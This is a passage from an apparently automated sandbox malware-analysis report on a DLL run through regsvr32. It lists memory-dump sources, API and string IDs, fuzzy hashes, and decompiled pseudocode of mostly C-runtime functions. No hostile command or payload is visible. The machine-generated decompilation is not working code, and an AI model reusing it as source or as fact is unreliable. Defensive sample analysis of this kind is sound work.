                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (stream != NULL)$_fileno$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fileno.c
                                    • API String ID: 2123368286-3532421942
                                    • Opcode ID: c9b4c7eaa6f702e756935e157fc704da053bc53339d856ee334f13e3a5237ddc
                                    • Instruction ID: 5e243132be0629da1aa3e0b85d41bf950597728ff9ff9f12ab22c17114f4bf60
                                    • Opcode Fuzzy Hash: c9b4c7eaa6f702e756935e157fc704da053bc53339d856ee334f13e3a5237ddc
                                    • Instruction Fuzzy Hash: DB115A71A2D6468AEB949B54E948B6E73E0F340344F605225F6D943AA8C77ED509CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                    • API String ID: 2123368286-152112980
                                    • Opcode ID: bee2d7726ac50f9e7da98411c921f1d389d1484d621cac995bcaec902168c7d6
                                    • Instruction ID: 316e0cb66aac120259ec5fe7cf49b7d80870e23a4d2a4d539908350f5dd74761
                                    • Opcode Fuzzy Hash: bee2d7726ac50f9e7da98411c921f1d389d1484d621cac995bcaec902168c7d6
                                    • Instruction Fuzzy Hash: C1112A31A0CA87C9F7A09B54EC047AE76E0F340345F704425D6CC466F4CBBEE8888B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _unlock$CurrentThreadValue_calloc_dbg_calloc_dbg_impl
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dllcrt0.c
                                    • API String ID: 433497747-929597301
                                    • Opcode ID: e993b8295e4f15c9eb240b3e6c5194696fb031badc4e4f03d14c808df6e1b3aa
                                    • Instruction ID: 481e6957a9246cfaf4e6bd41be43a49f1ef1e62944320565ea2ccce3e108d99c
                                    • Opcode Fuzzy Hash: e993b8295e4f15c9eb240b3e6c5194696fb031badc4e4f03d14c808df6e1b3aa
                                    • Instruction Fuzzy Hash: F9012D21A2C64286E3D09B25EC4473EA2E0F784B50F719275A9DE426F5CF3FE4018601
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (count == 0) || (string != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                    • API String ID: 2123368286-3131718208
                                    • Opcode ID: 43b2844285fd77a1982b218cfc07c90d3f3fad476d4107e0837d5d8b2ccbe159
                                    • Instruction ID: 25215b7a66bf5335accef34de15d40bd2ed0749c1f690011489e68f1b39c7366
                                    • Opcode Fuzzy Hash: 43b2844285fd77a1982b218cfc07c90d3f3fad476d4107e0837d5d8b2ccbe159
                                    • Instruction Fuzzy Hash: F3113571E086429AF7A09B28E9047BE62D0F344308F608525A7EC076F5DB7EE548CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (format != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                    • API String ID: 2123368286-1927795013
                                    • Opcode ID: 98ed0b5fdb5fc60e70232fca9ee65f87cb4d2692f01eaf8ea89a3da70423e3bd
                                    • Instruction ID: 944cdc0bbf70bc89b755e38a530f77822666c2a95ff09ee036fe4101a55fb2d6
                                    • Opcode Fuzzy Hash: 98ed0b5fdb5fc60e70232fca9ee65f87cb4d2692f01eaf8ea89a3da70423e3bd
                                    • Instruction Fuzzy Hash: 62010831E0C646DAF7A09B68EC057AD66D0B380354FB04625A69C066F9DB7EE589CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: _msize_dbg$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pUserData != NULL
                                    • API String ID: 2123368286-563024394
                                    • Opcode ID: 4f42008d2eeb6119988a971f0b8ebe92e3bb2dd5d0d6607e11ba140e367e8579
                                    • Instruction ID: a0eba8665c26eae2e6ed32b737e6c8ef722208237a38dcf7c055842964877d15
                                    • Opcode Fuzzy Hash: 4f42008d2eeb6119988a971f0b8ebe92e3bb2dd5d0d6607e11ba140e367e8579
                                    • Instruction Fuzzy Hash: 5B01483190860A86FBA09B14EC417AE62E0F351328FB14222D2DC126E4DB7FE545CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL
                                    • API String ID: 2123368286-577066449
                                    • Opcode ID: e471ef19857bf677b9863c0521a2362ee6eb8c4f9ff1322e4db10fa111c1afe4
                                    • Instruction ID: 4a3f651cd4551bfcababacb72a39fd99133eb44e8e6a79d9543262d1bb372964
                                    • Opcode Fuzzy Hash: e471ef19857bf677b9863c0521a2362ee6eb8c4f9ff1322e4db10fa111c1afe4
                                    • Instruction Fuzzy Hash: 5D019630E0860ACAE7A09B10EC817AD22E0E794394FA08025A2CD066F8DB3EE6448B00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 1646373207-1276376045
                                    • Opcode ID: 5b280635b15effc0f011d898b8b9467002935a92ac88a45419cb005d03af6660
                                    • Instruction ID: 8122274e17013f5b0610865d0345eaa92fe91d894f768ab51d4a4384d1174919
                                    • Opcode Fuzzy Hash: 5b280635b15effc0f011d898b8b9467002935a92ac88a45419cb005d03af6660
                                    • Instruction Fuzzy Hash: A5F0AC31918A4282D674DF18F94836DB7B0F384348F644125E6CE42678DF3ED559CA04
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 41%
                                    			E000007FE7FEF9D40C80(signed int __ecx, void* __eflags, void* __rax, void* __r8, signed int _a8) {
                                    				signed long long _v16;
                                    				long _v24;
                                    				void* _t57;
                                    				signed long long _t59;
                                    
                                    				_t57 = __rax;
                                    				_a8 = __ecx;
                                    				E000007FE7FEF9D3F900(_a8);
                                    				if (_t57 == 0xffffffff) goto 0xf9d40d05;
                                    				if (_a8 != 1) goto 0xf9d40cb3;
                                    				if (( *( *0xf9d4e560 + 0xb8) & 0x00000001) != 0) goto 0xf9d40ccc;
                                    				if (_a8 != 2) goto 0xf9d40cef;
                                    				_t59 =  *0xf9d4e560;
                                    				if (( *(_t59 + 0x60) & 0x00000001) == 0) goto 0xf9d40cef;
                                    				E000007FE7FEF9D3F900(1);
                                    				_v16 = _t59;
                                    				E000007FE7FEF9D3F900(2);
                                    				if (_v16 == _t59) goto 0xf9d40d05;
                                    				E000007FE7FEF9D3F900(_a8);
                                    				if (CloseHandle(??) == 0) goto 0xf9d40d0f;
                                    				_v24 = 0;
                                    				goto 0xf9d40d19;
                                    				_v24 = GetLastError();
                                    				E000007FE7FEF9D3F7D0(_a8, _t59);
                                    				 *((char*)( *((intOrPtr*)(0xf9d4e560 + _t59 * 8)) + 8 + (_a8 & 0x0000001f) * 0x58)) = 0;
                                    				if (_v24 == 0) goto 0xf9d40d60;
                                    				E000007FE7FEF9D2AA70(_v24,  *((intOrPtr*)(0xf9d4e560 + _t59 * 8)));
                                    				goto 0xf9d40d62;
                                    				return 0;
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLast__doserrno_dosmaperr_free_osfhnd
                                    • String ID:
                                    • API String ID: 1551955814-0
                                    • Opcode ID: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                    • Instruction ID: de0ed08be9decc95e7dd14c86c95eccfc4319969b2c7c8741dbc19f533f0ba9a
                                    • Opcode Fuzzy Hash: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                    • Instruction Fuzzy Hash: 4A219F32A0C64686E7A49B28EC4133E72E1F781355F348235E6DD46AF9DB2EE845CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FormatLocaleThread$DateTime
                                    • String ID:
                                    • API String ID: 3587784874-0
                                    • Opcode ID: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                    • Instruction ID: 0d03bf333fdb9b17262424d59d82d7c7719cce37cb4ba974854027563787c74d
                                    • Opcode Fuzzy Hash: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                    • Instruction Fuzzy Hash: 3311E33160878086E3608F68F94025EB7E0F748BA4F648724EF9D47BA8CB3ED1418700
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 23%
                                    			E000007FE7FEF9D2A5E0(long long __rcx, void* _a8) {
                                    				signed int _v24;
                                    				char _v42;
                                    				void* _v48;
                                    				signed int _v56;
                                    				char _v312;
                                    				signed char* _v328;
                                    				char _v584;
                                    				char _v840;
                                    				char _v1352;
                                    				char _v1384;
                                    				char _v1392;
                                    				intOrPtr _v1400;
                                    				long long _v1408;
                                    				long long _v1416;
                                    				signed long long _t206;
                                    				signed char* _t214;
                                    				signed long long _t223;
                                    				intOrPtr _t225;
                                    				intOrPtr _t226;
                                    				signed long long _t233;
                                    
                                    				_t224 = __rcx;
                                    				_a8 = __rcx;
                                    				_t206 =  *0xf9d4b018; // 0x6ec74913a662
                                    				_v24 = _t206 ^ _t233;
                                    				if (GetCPInfo(??, ??) == 0) goto 0xf9d2a906;
                                    				_v56 = 0;
                                    				goto 0xf9d2a63c;
                                    				_v56 = _v56 + 1;
                                    				if (_v56 - 0x100 >= 0) goto 0xf9d2a661;
                                    				 *((char*)(_t233 + _a8 + 0x470)) = _v56 & 0x000000ff;
                                    				goto 0xf9d2a62c;
                                    				_v312 = 0x20;
                                    				_v328 =  &_v42;
                                    				goto 0xf9d2a68f;
                                    				_v328 =  &(_v328[2]);
                                    				if (( *_v328 & 0x000000ff) == 0) goto 0xf9d2a6ea;
                                    				_v56 =  *_v328 & 0x000000ff;
                                    				goto 0xf9d2a6c2;
                                    				_v56 = _v56 + 1;
                                    				_t214 = _v328;
                                    				if (_v56 - ( *(_t214 + 1) & 0x000000ff) > 0) goto 0xf9d2a6e8;
                                    				 *((char*)(_t233 + _t214 + 0x470)) = 0x20;
                                    				goto 0xf9d2a6b2;
                                    				goto 0xf9d2a67b;
                                    				_v1392 = 0;
                                    				_v1400 =  *((intOrPtr*)(_a8 + 0xc));
                                    				_v1408 =  *((intOrPtr*)(_a8 + 4));
                                    				_v1416 =  &_v1352;
                                    				r9d = 0x100;
                                    				E000007FE7FEF9D2F4D0(1,  &_v1352, __rcx,  &_v312);
                                    				_v1384 = 0;
                                    				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                    				_v1400 = 0x100;
                                    				_v1408 =  &_v840;
                                    				_v1416 = 0x100;
                                    				r8d = 0x100;
                                    				E000007FE7FEF9D2EF00( *((intOrPtr*)(_a8 + 0xc)), _a8, _t224,  &_v312);
                                    				_v1384 = 0;
                                    				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                    				_v1400 = 0x100;
                                    				_v1408 =  &_v584;
                                    				_v1416 = 0x100;
                                    				r8d = 0x200;
                                    				_t223 = _a8;
                                    				E000007FE7FEF9D2EF00( *((intOrPtr*)(_t223 + 0xc)), _t223, _t224,  &_v312);
                                    				_v56 = 0;
                                    				_v56 = _v56 + 1;
                                    				if (_v56 - 0x100 >= 0) goto 0xf9d2a901;
                                    				if (( *(_t233 + 0x60 + _t223 * 2) & 1) == 0) goto 0xf9d2a879;
                                    				_t225 = _a8;
                                    				 *((char*)(_a8 + _t225 + 0x1c)) =  *(_t225 + _t223 + 0x1c) & 0x000000ff | 0x00000010;
                                    				 *((char*)(_a8 + _t225 + 0x11d)) =  *(_t233 + _t223 + 0x260) & 0x000000ff;
                                    				goto 0xf9d2a8fc;
                                    				if (( *(_t233 + 0x60 + _t223 * 2) & 2) == 0) goto 0xf9d2a8e5;
                                    				_t226 = _a8;
                                    				 *((char*)(_a8 + _t226 + 0x1c)) =  *(_t226 + _t223 + 0x1c) & 0x000000ff | 0x00000020;
                                    				 *((char*)(_a8 + _t226 + 0x11d)) =  *(_t233 + _t223 + 0x360) & 0x000000ff;
                                    				goto 0xf9d2a8fc;
                                    				 *((char*)(_a8 + _t223 + 0x11d)) = 0;
                                    				goto L1;
                                    				goto 0xf9d2aa20;
                                    				_v56 = 0;
                                    				_v56 = _v56 + 1;
                                    				_v56 = _v56 + 1;
                                    				if (_v56 - 0x100 >= 0) goto 0xf9d2aa20;
                                    				if (_v56 - 0x41 < 0) goto 0xf9d2a99c;
                                    				if (_v56 - 0x5a > 0) goto 0xf9d2a99c;
                                    				_v56 = _v56 + 1;
                                    				__rcx = _a8;
                                    				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000010;
                                    				_v56 = _v56 + 1;
                                    				__rdx = _a8;
                                    				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                    				_v56 = _v56 + 0x20;
                                    				__ecx = _v56;
                                    				__rdx = _a8;
                                    				 *((char*)(_a8 + __rcx + 0x11d)) = __al;
                                    				goto 0xf9d2aa1b;
                                    				if (_v56 - 0x61 < 0) goto 0xf9d2aa04;
                                    				if (_v56 - 0x7a > 0) goto 0xf9d2aa04;
                                    				_v56 = _v56 + 1;
                                    				__rcx = _a8;
                                    				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000020;
                                    				_v56 = _v56 + 1;
                                    				__rdx = _a8;
                                    				 *((char*)(_a8 + __rcx + 0x1c)) = __al;
                                    				_v56 = _v56 - 0x20;
                                    				__ecx = _v56;
                                    				__rdx = _a8;
                                    				 *((char*)(__rdx + __rcx + 0x11d)) = __al;
                                    				goto 0xf9d2aa1b;
                                    				__eax = _v56;
                                    				__rcx = _a8;
                                    				 *((char*)(_a8 + __rax + 0x11d)) = 0;
                                    				goto L2;
                                    				__rcx = _v24;
                                    				__rcx = _v24 ^ __rsp;
                                    				return E000007FE7FEF9D23280(_v56, _v56, __edx, _v24 ^ __rsp, __rdx, __r8);
                                    			}
                                    0x7fef9d2a9d2
                                    0x7fef9d2a9d6
                                    0x7fef9d2a9de
                                    0x7fef9d2a9e9
                                    0x7fef9d2a9ec
                                    0x7fef9d2a9f3
                                    0x7fef9d2a9fb
                                    0x7fef9d2aa02
                                    0x7fef9d2aa04
                                    0x7fef9d2aa0b
                                    0x7fef9d2aa13
                                    0x7fef9d2aa1b
                                    0x7fef9d2aa20
                                    0x7fef9d2aa28
                                    0x7fef9d2aa37

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Info
                                    • String ID: $z
                                    • API String ID: 1807457897-2251613814
                                    • Opcode ID: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                    • Instruction ID: 4853ceba84ddbb230417778543f3b3b02ea2aa858227094ccd1c634e11d49f23
                                    • Opcode Fuzzy Hash: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                    • Instruction Fuzzy Hash: C8B1B77261CAC0CAD7B58B29E8807AFB7E0F388785F155125DAC983B99DB2DD4429F00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 35%
                                    			E000007FE7FEF9D34960(void* __ecx, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int _a40, intOrPtr _a48, long long _a56, long long _a64) {
                                    				long long _v24;
                                    				long long _v32;
                                    				long long _v40;
                                    				long long _v48;
                                    				long long _v56;
                                    				char _v60;
                                    				char _v64;
                                    				signed int _v72;
                                    				char _v80;
                                    				char _v88;
                                    				long long _v96;
                                    				intOrPtr _v104;
                                    				long long _v112;
                                    				long long _v120;
                                    				long long _v128;
                                    				signed int _v136;
                                    				void* _t106;
                                    				void* _t117;
                                    				void* _t118;
                                    				void* _t119;
                                    				void* _t120;
                                    				void* _t121;
                                    				long long _t153;
                                    				signed int _t161;
                                    				signed int _t165;
                                    				long long _t166;
                                    				long long _t169;
                                    				long long _t170;
                                    				intOrPtr _t174;
                                    
                                    				_a32 = __r9;
                                    				_a24 = __r8;
                                    				_a16 = __rdx;
                                    				_a8 = __rcx;
                                    				_t153 = _a8;
                                    				if ( *_t153 != 0x80000003) goto 0xf9d34990;
                                    				goto 0xf9d34cc6;
                                    				0xf9d24000();
                                    				if ( *((long long*)(_t153 + 0xe0)) == 0) goto 0xf9d34a33;
                                    				0xf9d24000();
                                    				_v56 = _t153;
                                    				E000007FE7FEF9D23D00(_t106);
                                    				if ( *((intOrPtr*)(_v56 + 0xe0)) == _t153) goto 0xf9d34a33;
                                    				if ( *_a8 == 0xe0434f4d) goto 0xf9d34a33;
                                    				if ( *_a8 == 0xe0434352) goto 0xf9d34a33;
                                    				_v120 = _a64;
                                    				_v128 = _a56;
                                    				_v136 = _a40;
                                    				if (E000007FE7FEF9D2E9B0(_a8, _a16, _a24, _a32) == 0) goto 0xf9d34a33;
                                    				goto 0xf9d34cc6;
                                    				if ( *((intOrPtr*)(_a40 + 0xc)) == 0) goto 0xf9d34a43;
                                    				goto 0xf9d34a48;
                                    				E000007FE7FEF9D2CF80(_a40);
                                    				_v120 = _a32;
                                    				_v128 =  &_v60;
                                    				_t161 =  &_v64;
                                    				_v136 = _t161;
                                    				r9d = _a48;
                                    				r8d = _a56;
                                    				E000007FE7FEF9D2EA30(_a16, _a40);
                                    				_v72 = _t161;
                                    				_v64 = _v64 + 1;
                                    				_v72 = _v72 + 0x14;
                                    				if (_v64 - _v60 >= 0) goto 0xf9d34cc6;
                                    				if (_a48 -  *_v72 < 0) goto 0xf9d34c2b;
                                    				_t165 = _v72;
                                    				if (_a48 -  *((intOrPtr*)(_t165 + 4)) > 0) goto 0xf9d34c2b;
                                    				_t117 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t165 + 4)), _t165);
                                    				_t166 = _t165 +  *((intOrPtr*)(_v72 + 0x10));
                                    				if ( *((intOrPtr*)(_t166 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34b53;
                                    				_t118 = E000007FE7FEF9D2E680(_t117, _t166);
                                    				_v48 = _t166;
                                    				_t119 = E000007FE7FEF9D2E680(_t118, _t166);
                                    				_t169 = _v48 +  *((intOrPtr*)(_t166 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                    				_v40 = _t169;
                                    				goto 0xf9d34b5f;
                                    				_v40 = 0;
                                    				if (_v40 == 0) goto 0xf9d34bff;
                                    				_t120 = E000007FE7FEF9D2E680(_t119, _t169);
                                    				_t170 = _t169 +  *((intOrPtr*)(_v72 + 0x10));
                                    				if ( *((intOrPtr*)(_t170 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34be3;
                                    				_t121 = E000007FE7FEF9D2E680(_t120, _t170);
                                    				_v32 = _t170;
                                    				E000007FE7FEF9D2E680(_t121, _t170);
                                    				_v24 = _v32 +  *((intOrPtr*)(_t170 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                    				goto 0xf9d34bef;
                                    				_v24 = 0;
                                    				_t174 = _v24;
                                    				if ( *((char*)(_t174 + 0x10)) != 0) goto 0xf9d34c2b;
                                    				E000007FE7FEF9D2E680( *((char*)(_t174 + 0x10)), _t174);
                                    				if (( *(_t174 +  *((intOrPtr*)(_v72 + 0x10)) + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14) & 0x00000040) == 0) goto 0xf9d34c30;
                                    				goto L1;
                                    				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                    				_v72 =  *((intOrPtr*)(_v72 + 0x10));
                                    				__rax = __rax +  *((intOrPtr*)(_v72 + 0x10));
                                    				_v72 =  *((intOrPtr*)(_v72 + 0xc)) - 1;
                                    				__rcx = ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                    				__rax = __rax + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                    				__eflags = __rax;
                                    				_v80 = 0;
                                    				_v88 = 1;
                                    				__rcx = _a64;
                                    				_v96 = _a64;
                                    				_v104 = _a56;
                                    				__rcx = _v72;
                                    				_v112 = _v72;
                                    				_v120 = 0;
                                    				_v128 = __rax;
                                    				__rax = _a40;
                                    				_v136 = _a40;
                                    				__r9 = _a32;
                                    				__r8 = _a24;
                                    				__rdx = _a16;
                                    				__rcx = _a8;
                                    				__eax = E000007FE7FEF9D35180(__edi, __esi, __esp, __eflags, _a8, _a16, _a24, _a32);
                                    				goto L1;
                                    				return __eax;
                                    			}

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: MOC$RCC
                                    • API String ID: 0-2084237596
                                    • Opcode ID: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
